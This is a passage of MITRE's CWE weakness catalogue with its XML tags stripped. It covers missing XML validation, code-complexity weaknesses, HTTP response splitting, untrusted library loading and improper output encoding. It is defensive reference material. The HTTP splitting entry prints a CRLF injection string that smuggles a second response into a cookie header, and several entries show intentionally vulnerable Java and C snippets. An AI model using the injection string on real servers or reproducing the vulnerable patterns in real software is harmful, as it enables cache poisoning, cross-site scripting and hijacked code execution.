schema. + Most successful attacks begin with a violation of the programmer's assumptions. By accepting an XML document without validating it against a DTD or XML schema, the programmer leaves a door open for attackers to provide unexpected, unreasonable, or malicious input. + + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Input Validation + + Always validate XML input against a known XML Schema or DTD. + It is not possible for an XML parser to validate all aspects of a document's content because a parser cannot understand the complete semantics of the data. However, a parser can do a complete and thorough job of checking the document's structure and therefore guarantee to the code that processes the document that the content is well-formed. + + + + + + The following code loads and parses an XML file. + + + + // Read DOM + try {...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );} catch(Exception ex) {...} + + The XML file is loaded without validating it against a known XML Schema or DTD. + + + The following code creates a DocumentBuilder object to be used in building an XML document. + + DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();builderFactory.setNamespaceAware(true);DocumentBuilder builder = builderFactory.newDocumentBuilder(); + + The DocumentBuilder object does not validate an XML document against a schema, making it possible to create an invalid XML document. + + + + + Missing XML Validation + + + SFP24 + Tainted input to command + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code is too complex, as calculated using a well-defined, + quantitative measure. + This issue makes it more difficult to understand and/or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + Other + Reduce Performance + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code contains McCabe cyclomatic complexity that exceeds a + desirable maximum. + This issue makes it more difficult to understand and/or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + ASCMM-MNT-11 + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code is structured in a way that a Halstead complexity + measure exceeds a desirable maximum. + A variety of Halstead complexity measures exist, such as program vocabulary size or volume. + This issue makes it more difficult to understand and/or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses too much self-modifying + code. + This issue makes it more difficult to understand or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code contains a callable or other code grouping in which + the nesting / branching is too deep. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product has an attack surface whose quantitative + measurement exceeds a desirable maximum. + Originating from software security, an "attack surface" measure typically reflects the number of input points and output points that can be utilized by an untrusted party, i.e. a potential attacker. A larger attack surface provides more places to attack, and more opportunities for developers to introduce weaknesses. In some cases, this measure may reflect other aspects of quality besides security; e.g., a product with many inputs and outputs may require a large number of tests in order to improve code coverage. + + + + + + Indirect + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code declares a variable in one scope, but the + variable is only used within a narrower scope. + This issue makes it more difficult to understand and/or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code is compiled without sufficient warnings enabled, which + may prevent the detection of subtle bugs or quality + issues. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Build and Compilation + + + + + Other + Reduce Maintainability + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers. + + + HTTP agents or components may include a web server, load balancer, reverse proxy, web caching proxy, application firewall, web browser, etc. Regardless of the role, they are expected to maintain coherent, consistent HTTP communication state across all components. However, including unexpected data in an HTTP header allows an attacker to specify the entirety of the HTTP message that is rendered by the client HTTP agent (e.g., web browser) or back-end HTTP agent (e.g., web server), whether the message is part of a request or a response. + + When an HTTP request contains unexpected CR and LF characters, the server may respond with an output stream that is interpreted as "splitting" the stream into two different HTTP messages instead of one. CR is carriage return, also given by %0d or \r, and LF is line feed, also given by %0a or \n. + In addition to CR and LF characters, other valid/RFC compliant special characters and unique character encodings can be utilized, such as HT (horizontal tab, also given by %09 or \t) and SP (space, also given as + sign or %20). + These types of unvalidated and unexpected data in HTTP message headers allow an attacker to control the second "split" message to mount attacks such as server-side request forgery, cross-site scripting, and cache poisoning attacks. + HTTP response splitting weaknesses may be present when: + + Data enters a web application through an untrusted source, most frequently an HTTP request. + The data is included in an HTTP response header sent to a web user without neutralizing malicious characters that can be interpreted as separator characters for headers. + + + + + + + + + + + + + + + HTTP Request Splitting + + + HTTP Response Splitting + + + + + Implementation + + + + + Integrity + Access Control + Modify Application Data + Gain Privileges or Assume Identity + CR and LF characters in an HTTP header may give attackers control of the remaining headers and body of the message that the application intends to send/receive, as well as allowing them to create additional messages entirely under their control. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + Construct HTTP headers very carefully, avoiding the use of non-validated input data. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. If an input does not strictly conform to specifications, reject it or transform it into something that conforms. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response. + + String author = request.getParameter(AUTHOR_PARAM);...Cookie cookie = new Cookie("author", author);cookie.setMaxAge(cookieExpiration);response.addCookie(cookie); + + Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form: + + HTTP/1.1 200 OK...Set-Cookie: author=Jane Smith... + + However, because the value of the cookie is composed of unvalidated user input, the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as + + Wiley Hacker\r\nHTTP/1.1 200 OK\r\n + + then the HTTP response would be split into two responses of the following form: + + HTTP/1.1 200 OK...Set-Cookie: author=Wiley HackerHTTP/1.1 200 OK... + + The second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability to construct arbitrary HTTP responses permits a variety of resulting attacks, including: + + + + cross-user defacement + + + web and browser cache poisoning + + + cross-site scripting + + + page hijacking + + + + + + An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the server. + + Cross-User Defacement can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server. + + + In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application. + + + In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker. + + + + + + The impact of a maliciously constructed response can be magnified if it is cached, either by a web cache used by multiple users or even the browser cache of a single user. + + Cache Poisoning: if a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected. + + + + Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users. + + Cross-Site Scripting: cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user's browser. + The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site. + The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim's account. + + + + In addition to using a vulnerable application to send malicious content to a user, the same weakness can also be leveraged to redirect sensitive content generated by the server to the attacker instead of the intended user. + + Page Hijacking: by submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server to the attacker instead of the intended user. + Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker's request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker's request is already waiting and is interpreted as a response to the victim's request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim. + + + + + + CVE-2020-15811 + Chain: Proxy uses a substring search instead of parsing the Transfer-Encoding header (CWE-697), allowing request splitting (CWE-113) and cache poisoning + https://www.cve.org/CVERecord?id=CVE-2020-15811 + + + CVE-2021-41084 + Scala-based HTTP interface allows request splitting and response splitting through header names, header values, status reasons, and URIs + https://www.cve.org/CVERecord?id=CVE-2021-41084 + + + CVE-2018-12116 + Javascript-based framework allows request splitting through a path option of an HTTP request + https://www.cve.org/CVERecord?id=CVE-2018-12116 + + + CVE-2004-2146 + Application accepts CRLF in an object ID, allowing HTTP response splitting. + https://www.cve.org/CVERecord?id=CVE-2004-2146 + + + CVE-2004-1656 + Shopping cart allows HTTP response splitting to perform HTML injection via CRLF in a parameter for a url + https://www.cve.org/CVERecord?id=CVE-2004-1656 + + + CVE-2005-2060 + Bulletin board allows response splitting via CRLF in parameter. + https://www.cve.org/CVERecord?id=CVE-2005-2060 + + + CVE-2004-2512 + Response splitting via CRLF in PHPSESSID. + https://www.cve.org/CVERecord?id=CVE-2004-2512 + + + CVE-2005-1951 + e-commerce app allows HTTP response splitting using CRLF in object id parameters + https://www.cve.org/CVERecord?id=CVE-2005-1951 + + + + + HTTP response splitting + + + HTTP Response Splitting + + + 25 + HTTP Response Splitting + + + SFP24 + Tainted input to command + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated References, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Description, Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Potential_Mitigations, Relationships, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + 4.8 + 2022-06-28 + Critical + Extended the abstraction of this entry to include both HTTP request and response splitting. + + + CWE Content Team + MITRE + 2022-06-28 + 4.8 + 2022-06-28 + updated Alternate_Terms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2022-10-13 + 4.9 + 2022-10-13 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + 4.10 + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + 4.11 + 2023-04-23 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Jonathan Leitschuh + Dan Kaminsky Fellowship @ HUMAN Security + 2022-02-25 + 4.9 + 2022-10-13 + Suggested a new entry for HTTP Request Splitting, leading to scope expansion for CWE-113 + + HTTP Response Splitting + Failure to Sanitize CRLF Sequences in HTTP Headers (aka 'HTTP Response Splitting') + Failure to Sanitize CRLF Sequences in HTTP Headers ('HTTP Response Splitting') + Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting') + + + + Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker. + Process control vulnerabilities take two forms: + + An attacker can change the command that the program executes: the attacker explicitly controls what the command is. + An attacker can change the environment in which the command executes: the attacker implicitly controls what the command means. + + Process control vulnerabilities of the first type occur when either data enters the application from an untrusted source and the data is used as part of a string representing a command that is executed by the application. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have. + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Libraries or Frameworks + Libraries that are loaded should be well understood and come from a trusted source. The application can execute code contained in the native libraries, which often contain calls that are susceptible to other security problems, such as buffer overflows or command injection. All native libraries should be validated to determine if the application requires the use of the library. It is very difficult to determine what these native libraries actually do, and the potential for malicious code is high. In addition, the potential for an inadvertent mistake in these native libraries is also high, as many are written in C or C++ and may be susceptible to buffer overflow or race condition problems. To help prevent buffer overflow attacks, validate all input to native calls for content and length. If the native library does not come from a trusted source, review the source code of the library. The library should be built from the reviewed source before using it. + + + + + The following code uses System.loadLibrary() to load code from a native library named library.dll, which is normally found in a standard system directory. + + ...System.loadLibrary("library.dll");... + + The problem here is that System.loadLibrary() accepts a library name, not a path, for the library to be loaded. From the Java 1.4.2 API documentation this function behaves as follows [1]: A file containing native code is loaded from the local file system from a place where library files are conventionally obtained. The details of this process are implementation-dependent. The mapping from a library name to a specific filename is done in a system-specific manner. If an attacker is able to place a malicious copy of library.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker's library.dll will now be run with elevated privileges, possibly giving them complete control of the system. + + + The following code from a privileged application uses a registry entry to determine the directory in which it is installed and loads a library file based on a relative path from the specified directory. + + ...RegQueryValueEx(hkey, "APPHOME",0, 0, (BYTE*)home, &size);char* lib=(char*)malloc(strlen(home)+strlen(INITLIB));if (lib) { + + strcpy(lib,home);strcat(lib,INITCMD);LoadLibrary(lib); + }... + + The code in this example allows an attacker to load an arbitrary library, from which code will be executed with the elevated privilege of the application, by modifying a registry key to specify a different path containing a malicious version of INITLIB. Because the program does not validate the value read from the environment, if an attacker can control the value of APPHOME, they can fool the application into running malicious code. + + + The following code is from a web-based administration utility that allows users access to an interface through which they can update their profile on the system. The utility makes use of a library named liberty.dll, which is normally found in a standard system directory. + + LoadLibrary("liberty.dll"); + + The problem is that the program does not specify an absolute path for liberty.dll. If an attacker is able to place a malicious library named liberty.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker's liberty.dll will now be run with elevated privileges, possibly giving the attacker complete control of the system. The type of attack seen in this example is made possible because of the search order used by LoadLibrary() when an absolute path is not specified. If the current directory is searched before system directories, as was the case up until the most recent versions of Windows, then this type of attack becomes trivial if the attacker can execute the program locally. The search order is operating system version dependent, and is controlled on newer operating systems by the value of the registry key: HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode + + + + System Process + + + + Process Control + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions. + This entry seems to have close relationships with CWE-426/CWE-427. It seems more attack-oriented. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product misinterprets an input, whether from an attacker or another product, in a security-relevant fashion. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Unexpected State + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + CVE-2005-2225 + Product sees dangerous file extension in free text of a group discussion, disconnects all users. + https://www.cve.org/CVERecord?id=CVE-2005-2225 + + + CVE-2001-0003 + Product does not correctly import and process security settings from another product. + https://www.cve.org/CVERecord?id=CVE-2001-0003 + + + + + Misinterpretation Error + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This concept needs further study. It is likely a factor in several weaknesses, possibly resultant as well. Overlaps Multiple Interpretation Errors (MIE). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Misinterpretation Error + + + + The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved. + + Improper encoding or escaping can allow attackers to change the commands that are sent to another component, inserting malicious commands instead. + Most products follow a certain protocol that uses structured messages for communication between components, such as queries or commands. These structured messages can contain raw data interspersed with metadata or control information. For example, "GET /index.html HTTP/1.1" is a structured message containing a command ("GET") with a single argument ("/index.html") and metadata about which protocol version is being used ("HTTP/1.1"). + If an application uses attacker-supplied inputs to construct a structured message without properly encoding or escaping, then the attacker could insert special characters that will cause the data to be interpreted as control information or metadata. Consequently, the component that receives the output will perform the wrong operations, or otherwise interpret the data incorrectly. + + + + + + + + + + + + + Output Sanitization + + + Output Validation + + + Output Encoding + + + + + Implementation + + + Operation + + + High + + + Integrity + Modify Application Data + The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted. + + + 